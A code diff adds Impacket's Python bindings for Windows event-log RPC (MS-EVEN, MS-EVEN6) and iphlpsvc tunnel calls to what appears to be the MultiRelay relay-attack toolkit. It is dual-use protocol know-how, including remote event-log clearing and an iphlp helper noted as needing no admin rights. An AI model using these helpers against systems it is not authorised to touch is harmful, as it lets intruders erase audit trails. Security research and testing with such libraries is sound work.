+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file.
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDR, NDRPOINTERNULL, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import ULONG, LPWSTR, RPC_UNICODE_STRING, LPSTR, NTSTATUS, NULL, PRPC_UNICODE_STRING, PULONG, USHORT, PRPC_SID, LPBYTE
+from impacket.dcerpc.v5.lsad import PRPC_UNICODE_STRING_ARRAY
+from impacket.structure import Structure
+from impacket import nt_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_EVEN  = uuidtup_to_bin(('82273FDC-E32A-18C3-3F78-827929DC23EA','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+            return 'EVEN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'EVEN SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.2 EventType
+EVENTLOG_SUCCESS           = 0x0000
+EVENTLOG_ERROR_TYPE        = 0x0001
+EVENTLOG_WARNING_TYPE      = 0x0002
+EVENTLOG_INFORMATION_TYPE  = 0x0004
+EVENTLOG_AUDIT_SUCCESS     = 0x0008
+EVENTLOG_AUDIT_FAILURE     = 0x0010
+
+# 2.2.7 EVENTLOG_HANDLE_A and EVENTLOG_HANDLE_W
+#EVENTLOG_HANDLE_A
+EVENTLOG_HANDLE_W = LPWSTR
+
+# 2.2.9 Constants Used in Method Definitions
+MAX_STRINGS      = 0x00000100
+MAX_SINGLE_EVENT = 0x0003FFFF
+MAX_BATCH_BUFF   = 0x0007FFFF
+
+# 3.1.4.7 ElfrReadELW (Opnum 10)
+EVENTLOG_SEQUENTIAL_READ = 0x00000001
+EVENTLOG_SEEK_READ       = 0x00000002
+
+EVENTLOG_FORWARDS_READ   = 0x00000004
+EVENTLOG_BACKWARDS_READ  = 0x00000008
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class IELF_HANDLE(NDRSTRUCT):
+    structure =  (
+        ('Data','20s=""'),
+    )
+    def getAlignment(self):
+        return 1
+
+# 2.2.3 EVENTLOGRECORD
+class EVENTLOGRECORD(Structure):
+    structure = (
+        ('Length','<L=0'),
+        ('Reserved','<L=0'),
+        ('RecordNumber','<L=0'),
+        ('TimeGenerated','<L=0'),
+        ('TimeWritten','<L=0'),
+        ('EventID','<L=0'),
+        ('EventType','<H=0'),
+        ('NumStrings','<H=0'),
+        ('EventCategory','<H=0'),
+        ('ReservedFlags','<H=0'),
+        ('ClosingRecordNumber','<L=0'),
+        ('StringOffset','<L=0'),
+        ('UserSidLength','<L=0'),
+        ('UserSidOffset','<L=0'),
+        ('DataLength','<L=0'),
+        ('DataOffset','<L=0'),
+        ('SourceName','z'),
+        ('Computername','z'),
+        ('UserSidPadding',':'),
+        ('_UserSid','_-UserSid', 'self["UserSidLength"]'),
+        ('UserSid',':'),
+        ('Strings',':'),
+        ('_Data','_-Data', 'self["DataLength"]'),
+        ('Data',':'),
+        ('Padding',':'),
+        ('Length2','<L=0'),
+    )
+
+# 2.2.4 EVENTLOG_FULL_INFORMATION
+class EVENTLOG_FULL_INFORMATION(NDRSTRUCT):
+    structure = (
+        ('dwFull', ULONG),
+    )
+
+# 2.2.8 RPC_CLIENT_ID
+class RPC_CLIENT_ID(NDRSTRUCT):
+    structure = (
+        ('UniqueProcess', ULONG),
+        ('UniqueThread', ULONG),
+    )
+
+# 2.2.12 RPC_STRING
+class RPC_STRING(NDRSTRUCT):
+    structure = (
+        ('Length','<H=0'),
+        ('MaximumLength','<H=0'),
+        ('Data',LPSTR),
+    )
+
+    def __setitem__(self, key, value):
+        if key == 'Data' and isinstance(value, NDR) is False:
+            self['Length'] = len(value)
+            self['MaximumLength'] = len(value)
+        return NDRSTRUCT.__setitem__(self, key, value)
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None: msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+
+        if isinstance(self.fields['Data'] , NDRPOINTERNULL):
+            print(" NULL", end=' ')
+        elif self.fields['Data']['ReferentID'] == 0:
+            print(" NULL", end=' ')
+        else:
+            return self.fields['Data'].dump('',indent)
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.9 ElfrClearELFW (Opnum 0)
+class ElfrClearELFW(NDRCALL):
+    opnum = 0
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('BackupFileName', PRPC_UNICODE_STRING),
+    )
+
+class ElfrClearELFWResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.11 ElfrBackupELFW (Opnum 1)
+class ElfrBackupELFW(NDRCALL):
+    opnum = 1
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('BackupFileName', RPC_UNICODE_STRING),
+    )
+
+class ElfrBackupELFWResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.21 ElfrCloseEL (Opnum 2)
+class ElfrCloseEL(NDRCALL):
+    opnum = 2
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrCloseELResponse(NDRCALL):
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.18 ElfrNumberOfRecords (Opnum 4)
+class ElfrNumberOfRecords(NDRCALL):
+    opnum = 4
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrNumberOfRecordsResponse(NDRCALL):
+    structure = (
+        ('NumberOfRecords', ULONG),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.19 ElfrOldestRecord (Opnum 5)
+class ElfrOldestRecord(NDRCALL):
+    opnum = 5
+    structure = (
+        ('LogHandle', IELF_HANDLE),
+    )
+
+class ElfrOldestRecordResponse(NDRCALL):
+    structure = (
+        ('OldestRecordNumber', ULONG),
+        ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.3 ElfrOpenELW (Opnum 7)
+class ElfrOpenELW(NDRCALL):
+    opnum = 7
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('ModuleName', RPC_UNICODE_STRING),
+       ('RegModuleName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrOpenELWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.5 ElfrRegisterEventSourceW (Opnum 8)
+class ElfrRegisterEventSourceW(NDRCALL):
+    opnum = 8
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('ModuleName', RPC_UNICODE_STRING),
+       ('RegModuleName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrRegisterEventSourceWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.1 ElfrOpenBELW (Opnum 9)
+class ElfrOpenBELW(NDRCALL):
+    opnum = 9
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('BackupFileName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrOpenBELWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.7 ElfrReadELW (Opnum 10)
+class ElfrReadELW(NDRCALL):
+    opnum = 10
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ReadFlags', ULONG),
+       ('RecordOffset', ULONG),
+       ('NumberOfBytesToRead', ULONG),
+    )
+
+class ElfrReadELWResponse(NDRCALL):
+    structure = (
+       ('Buffer', NDRUniConformantArray),
+       ('NumberOfBytesRead', ULONG),
+       ('MinNumberOfBytesNeeded', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.13 ElfrReportEventW (Opnum 11)
+class ElfrReportEventW(NDRCALL):
+    opnum = 11
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('Time', ULONG),
+       ('EventType', USHORT),
+       ('EventCategory', USHORT),
+       ('EventID', ULONG),
+       ('NumStrings', USHORT),
+       ('DataSize', ULONG),
+       ('ComputerName', RPC_UNICODE_STRING),
+       ('UserSID', PRPC_SID),
+       ('Strings', PRPC_UNICODE_STRING_ARRAY),
+       ('Data', LPBYTE),
+       ('Flags', USHORT),
+       ('RecordNumber', PULONG),
+       ('TimeWritten', PULONG),
+    )
+
+class ElfrReportEventWResponse(NDRCALL):
+    structure = (
+       ('RecordNumber', PULONG),
+       ('TimeWritten', PULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0   : (ElfrClearELFW, ElfrClearELFWResponse),
+    1   : (ElfrBackupELFW, ElfrBackupELFWResponse),
+    2   : (ElfrCloseEL, ElfrCloseELResponse),
+    4   : (ElfrNumberOfRecords, ElfrNumberOfRecordsResponse),
+    5   : (ElfrOldestRecord, ElfrOldestRecordResponse),
+    7   : (ElfrOpenELW, ElfrOpenELWResponse),
+    8   : (ElfrRegisterEventSourceW, ElfrRegisterEventSourceWResponse),
+    9   : (ElfrOpenBELW, ElfrOpenBELWResponse),
+    10  : (ElfrReadELW, ElfrReadELWResponse),
+    11  : (ElfrReportEventW, ElfrReportEventWResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hElfrOpenBELW(dce, backupFileName = NULL):
+    request = ElfrOpenBELW()
+    request['UNCServerName'] = NULL
+    request['BackupFileName'] = backupFileName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrOpenELW(dce, moduleName = NULL, regModuleName = NULL):
+    request = ElfrOpenELW()
+    request['UNCServerName'] = NULL
+    request['ModuleName'] = moduleName
+    request['RegModuleName'] = regModuleName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrCloseEL(dce, logHandle):
+    request = ElfrCloseEL()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp
+
+def hElfrRegisterEventSourceW(dce, moduleName = NULL, regModuleName = NULL):
+    request = ElfrRegisterEventSourceW()
+    request['UNCServerName'] = NULL
+    request['ModuleName'] = moduleName
+    request['RegModuleName'] = regModuleName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrReadELW(dce, logHandle = '', readFlags = EVENTLOG_SEEK_READ|EVENTLOG_FORWARDS_READ,
+                 recordOffset = 0, numberOfBytesToRead = MAX_BATCH_BUFF):
+    request = ElfrReadELW()
+    request['LogHandle'] = logHandle
+    request['ReadFlags'] = readFlags
+    request['RecordOffset'] = recordOffset
+    request['NumberOfBytesToRead'] = numberOfBytesToRead
+    return dce.request(request)
+
+def hElfrClearELFW(dce, logHandle = '', backupFileName = NULL):
+    request = ElfrClearELFW()
+    request['LogHandle'] = logHandle
+    request['BackupFileName'] = backupFileName
+    return dce.request(request)
+
+def hElfrBackupELFW(dce, logHandle = '', backupFileName = NULL):
+    request = ElfrBackupELFW()
+    request['LogHandle'] = logHandle
+    request['BackupFileName'] = backupFileName
+    return dce.request(request)
+
+def hElfrNumberOfRecords(dce, logHandle):
+    request = ElfrNumberOfRecords()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp
+
+def hElfrOldestRecordNumber(dce, logHandle):
+    request = ElfrOldestRecord()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/even6.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/even6.py
@@ -0,0 +1,344 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+# Copyright (c) 2017 @MrAnde7son
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Itamar (@MrAnde7son)
+#
+# Description:
+#   Initial [MS-EVEN6] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file.
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too.
+#
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD, LPWSTR, ULONG, LARGE_INTEGER, WORD, BYTE
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray, NDRUniVaryingArray, NDRSTRUCT
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_EVEN6 = uuidtup_to_bin(('F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__(self):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+            return 'EVEN6 SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'EVEN6 SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Evt Path Flags
+EvtQueryChannelName = 0x00000001
+EvtQueryFilePath = 0x00000002
+EvtReadOldestToNewest = 0x00000100
+EvtReadNewestToOldest = 0x00000200
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class CONTEXT_HANDLE_LOG_HANDLE(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_LOG_HANDLE(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_LOG_HANDLE),
+    )
+
+class CONTEXT_HANDLE_LOG_QUERY(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_LOG_QUERY),
+    )
+
+class LPPCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
+    referent = (
+        ('Data', PCONTEXT_HANDLE_LOG_QUERY),
+    )
+
+class CONTEXT_HANDLE_OPERATION_CONTROL(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_OPERATION_CONTROL(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_OPERATION_CONTROL),
+    )
+
+# 2.2.11 EvtRpcQueryChannelInfo
+class EvtRpcQueryChannelInfo(NDRSTRUCT):
+    structure = (
+        ('Name', LPWSTR),
+        ('Status', DWORD),
+    )
+
+class EvtRpcQueryChannelInfoArray(NDRUniVaryingArray):
+    item = EvtRpcQueryChannelInfo
+
+class LPEvtRpcQueryChannelInfoArray(NDRPOINTER):
+    referent = (
+        ('Data', EvtRpcQueryChannelInfoArray)
+    )
+
+class RPC_INFO(NDRSTRUCT):
+    structure = (
+        ('Error', DWORD),
+        ('SubError', DWORD),
+        ('SubErrorParam', DWORD),
+    )
+
+class PRPC_INFO(NDRPOINTER):
+    referent = (
+        ('Data', RPC_INFO)
+    )
+
+class WSTR_ARRAY(NDRUniVaryingArray):
+    item = WSTR
+
+class DWORD_ARRAY(NDRUniVaryingArray):
+    item = DWORD
+
+class LPDWORD_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', DWORD_ARRAY)
+    )
+
+class BYTE_ARRAY(NDRUniVaryingArray):
+    item = 'c'
+
+class CBYTE_ARRAY(NDRUniVaryingArray):
+    item = BYTE
+
+class CDWORD_ARRAY(NDRUniConformantArray):
+    item = DWORD
+
+class LPBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', CBYTE_ARRAY)
+    )
+
+class ULONG_ARRAY(NDRUniVaryingArray):
+    item = ULONG
+
+# 2.3.1 EVENT_DESCRIPTOR
+class EVENT_DESCRIPTOR(NDRSTRUCT):
+    structure = (
+        ('Id', WORD),
+        ('Version', BYTE),
+        ('Channel', BYTE),
+        ('LevelSeverity', BYTE),
+        ('Opcode', BYTE),
+        ('Task', WORD),
+        ('Keyword', ULONG),
+    )
+
+class BOOKMARK(NDRSTRUCT):
+    structure = (
+        ('BookmarkSize', DWORD),
+        ('HeaderSize', '<L=0x18'),
+        ('ChannelSize', DWORD),
+        ('CurrentChannel', DWORD),
+        ('ReadDirection', DWORD),
+        ('RecordIdsOffset', DWORD),
+        ('LogRecordNumbers', ULONG_ARRAY),
+    )
+
+
+#2.2.17 RESULT_SET
+class RESULT_SET(NDRSTRUCT):
+    structure = (
+        ('TotalSize', DWORD),
+        ('HeaderSize', DWORD),
+        ('EventOffset', DWORD),
+        ('BookmarkOffset', DWORD),
+        ('BinXmlSize', DWORD),
+        ('EventData', BYTE_ARRAY),
+        #('NumberOfSubqueryIDs', '<L=0'),
+        #('SubqueryIDs', BYTE_ARRAY),
+        #('BookMarkData', BOOKMARK),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+class EvtRpcRegisterLogQuery(NDRCALL):
+    opnum = 5
+    structure = (
+        ('Path', LPWSTR),
+        ('Query', WSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcRegisterLogQueryResponse(NDRCALL):
+    structure = (
+        ('Handle', CONTEXT_HANDLE_LOG_QUERY),
+        ('OpControl', CONTEXT_HANDLE_OPERATION_CONTROL),
+        ('QueryChannelInfoSize', DWORD),
+        ('QueryChannelInfo', EvtRpcQueryChannelInfoArray),
+        ('Error', RPC_INFO),
+        )
+
+class EvtRpcQueryNext(NDRCALL):
+    opnum = 11
+    structure = (
+        ('LogQuery', CONTEXT_HANDLE_LOG_QUERY),
+        ('NumRequestedRecords', DWORD),
+        ('TimeOutEnd', DWORD),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcQueryNextResponse(NDRCALL):
+    structure = (
+        ('NumActualRecords', DWORD),
+        ('EventDataIndices', DWORD_ARRAY),
+        ('EventDataSizes', DWORD_ARRAY),
+        ('ResultBufferSize', DWORD),
+        ('ResultBuffer', BYTE_ARRAY),
+        ('ErrorCode', ULONG),
+    )
+
+class EvtRpcQuerySeek(NDRCALL):
+    opnum = 12
+    structure = (
+        ('LogQuery', CONTEXT_HANDLE_LOG_QUERY),
+        ('Pos', LARGE_INTEGER),
+        ('BookmarkXML', LPWSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcQuerySeekResponse(NDRCALL):
+    structure = (
+        ('Error', RPC_INFO),
+    )
+
+class EvtRpcClose(NDRCALL):
+    opnum = 13
+    structure = (
+        ("Handle", CONTEXT_HANDLE_LOG_HANDLE),
+    )
+
+class EvtRpcCloseResponse(NDRCALL):
+    structure = (
+        ("Handle", PCONTEXT_HANDLE_LOG_HANDLE),
+        ('ErrorCode', ULONG),
+    )
+
+class EvtRpcOpenLogHandle(NDRCALL):
+    opnum = 17
+    structure = (
+        ('Channel', WSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcOpenLogHandleResponse(NDRCALL):
+    structure = (
+        ('Handle', PCONTEXT_HANDLE_LOG_HANDLE),
+        ('Error', RPC_INFO),
+    )
+
+class EvtRpcGetChannelList(NDRCALL):
+    opnum = 19
+    structure = (
+        ('Flags', DWORD),
+    )
+
+class EvtRpcGetChannelListResponse(NDRCALL):
+    structure = (
+        ('NumChannelPaths', DWORD),
+        ('ChannelPaths', WSTR_ARRAY),
+        ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+
+OPNUMS = {
+    5   : (EvtRpcRegisterLogQuery, EvtRpcRegisterLogQueryResponse),
+    11  : (EvtRpcQueryNext,  EvtRpcQueryNextResponse),
+    12  : (EvtRpcQuerySeek, EvtRpcQuerySeekResponse),
+    13  : (EvtRpcClose, EvtRpcCloseResponse),
+    17  : (EvtRpcOpenLogHandle, EvtRpcOpenLogHandle),
+    19  : (EvtRpcGetChannelList, EvtRpcGetChannelListResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+
+def hEvtRpcRegisterLogQuery(dce, path, flags, query='*\x00'):
+    request = EvtRpcRegisterLogQuery()
+
+    request['Path'] = path
+    request['Query'] = query
+    request['Flags'] = flags
+    resp = dce.request(request)
+    return resp
+
+def hEvtRpcQueryNext(dce, handle, numRequestedRecords, timeOutEnd=1000):
+    request = EvtRpcQueryNext()
+
+    request['LogQuery'] = handle
+    request['NumRequestedRecords'] = numRequestedRecords
+    request['TimeOutEnd'] = timeOutEnd
+    request['Flags'] = 0
+    status = system_errors.ERROR_MORE_DATA
+    resp = dce.request(request)
+    while status == system_errors.ERROR_MORE_DATA:
+        try:
+            resp = dce.request(request)
+        except DCERPCException as e:
+            if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
+                raise
+            elif str(e).find('ERROR_TIMEOUT') < 0:
+                raise
+            resp = e.get_packet()
+        return resp
+
+def hEvtRpcClose(dce, handle):
+    request = EvtRpcClose()
+    request['Handle'] = handle
+    resp = dce.request(request)
+    return resp
+
+def hEvtRpcOpenLogHandle(dce, channel, flags):
+    request = EvtRpcOpenLogHandle()
+
+    request['Channel'] = channel
+    request['Flags'] = flags
+    return dce.request(request)
+
+def hEvtRpcGetChannelList(dce):
+    request = EvtRpcGetChannelList()
+
+    request['Flags'] = 0
+    resp = dce.request(request)
+    return resp
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/iphlp.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/iphlp.py
@@ -0,0 +1,172 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+# Description:
+#  Implementation of iphlpsvc.dll MSRPC calls (Service that offers IPv6 connectivity over an IPv4 network)
+
+from socket import inet_aton
+
+from impacket import uuid
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.dtypes import BYTE, ULONG, WSTR, GUID, NULL
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_IPHLP_IP_TRANSITION   = uuidtup_to_bin(('552d076a-cb29-4e44-8b6a-d15e59e2c0af', '1.0'))
+
+# RPC_IF_ALLOW_LOCAL_ONLY
+MSRPC_UUID_IPHLP_TEREDO          = uuidtup_to_bin(('ecbdb051-f208-46b9-8c8b-648d9d3f3944', '1.0'))
+MSRPC_UUID_IPHLP_TEREDO_CONSUMER = uuidtup_to_bin(('1fff8faa-ec23-4e3f-a8ce-4b2f8707e636', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'IPHLP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'IPHLP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Notification types
+NOTIFICATION_ISATAP_CONFIGURATION_CHANGE               = 0
+NOTIFICATION_PROCESS6TO4_CONFIGURATION_CHANGE          = 1
+NOTIFICATION_TEREDO_CONFIGURATION_CHANGE               = 2
+NOTIFICATION_IP_TLS_CONFIGURATION_CHANGE               = 3
+NOTIFICATION_PORT_CONFIGURATION_CHANGE                 = 4
+NOTIFICATION_DNS64_CONFIGURATION_CHANGE                = 5
+NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX = 6
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# Opnum 0
+class IpTransitionProtocolApplyConfigChanges(NDRCALL):
+    opnum = 0
+    structure = (
+       ('NotificationNum', BYTE),
+    )
+
+class IpTransitionProtocolApplyConfigChangesResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 1
+class IpTransitionProtocolApplyConfigChangesEx(NDRCALL):
+    opnum = 1
+    structure = (
+       ('NotificationNum', BYTE),
+       ('DataLength', ULONG),
+       ('Data', BYTE_ARRAY),
+    )
+
+class IpTransitionProtocolApplyConfigChangesExResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 2
+class IpTransitionCreatev6Inv4Tunnel(NDRCALL):
+    opnum = 2
+    structure = (
+       ('LocalAddress', "4s=''"),
+       ('RemoteAddress', "4s=''"),
+       ('InterfaceName', WSTR),
+    )
+
+class IpTransitionCreatev6Inv4TunnelResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 3
+class IpTransitionDeletev6Inv4Tunnel(NDRCALL):
+    opnum = 3
+    structure = (
+       ('TunnelGuid', GUID),
+    )
+
+class IpTransitionDeletev6Inv4TunnelResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+
+OPNUMS = {
+ 0 : (IpTransitionProtocolApplyConfigChanges, IpTransitionProtocolApplyConfigChangesResponse),
+ 1 : (IpTransitionProtocolApplyConfigChangesEx, IpTransitionProtocolApplyConfigChangesExResponse),
+ 2 : (IpTransitionCreatev6Inv4Tunnel, IpTransitionCreatev6Inv4TunnelResponse),
+ 3 : (IpTransitionDeletev6Inv4Tunnel, IpTransitionDeletev6Inv4TunnelResponse)
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+# For all notifications except EX
+def hIpTransitionProtocolApplyConfigChanges(dce, notification_num):
+    request = IpTransitionProtocolApplyConfigChanges()
+    request['NotificationNum'] = notification_num
+
+    return dce.request(request)
+
+# Only for NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX
+# No admin required
+def hIpTransitionProtocolApplyConfigChangesEx(dce, notification_num, notification_data):
+    request = IpTransitionProtocolApplyConfigChangesEx()
+    request['NotificationNum'] = notification_num
+    request['DataLength'] = len(notification_data)
+    request['Data'] = notification_data
+
+    return dce.request(request)
+
+# Same as netsh interface ipv6 add v6v4tunnel "Test Tunnel" 192.168.0.1 10.0.0.5
+def hIpTransitionCreatev6Inv4Tunnel(dce, local_address, remote_address, interface_name):
+    request = IpTransitionCreatev6Inv4Tunnel()
+    request['LocalAddress'] = inet_aton(local_address)
+    request['RemoteAddress'] = inet_aton(remote_address)
+
+    request['InterfaceName'] = checkNullString(interface_name)
+    request.fields['InterfaceName'].fields['MaximumCount'] = 256
+
+    return dce.request(request)
+
+def hIpTransitionDeletev6Inv4Tunnel(dce, tunnel_guid):
+    request = IpTransitionDeletev6Inv4Tunnel()
+    request['TunnelGuid'] = uuid.string_to_bin(tunnel_guid)
+
+    return dce.request(request)
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsad.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsad.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsat.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsat.py
@@ -0,0 +1,494 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-LSAT] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket import nt_errors
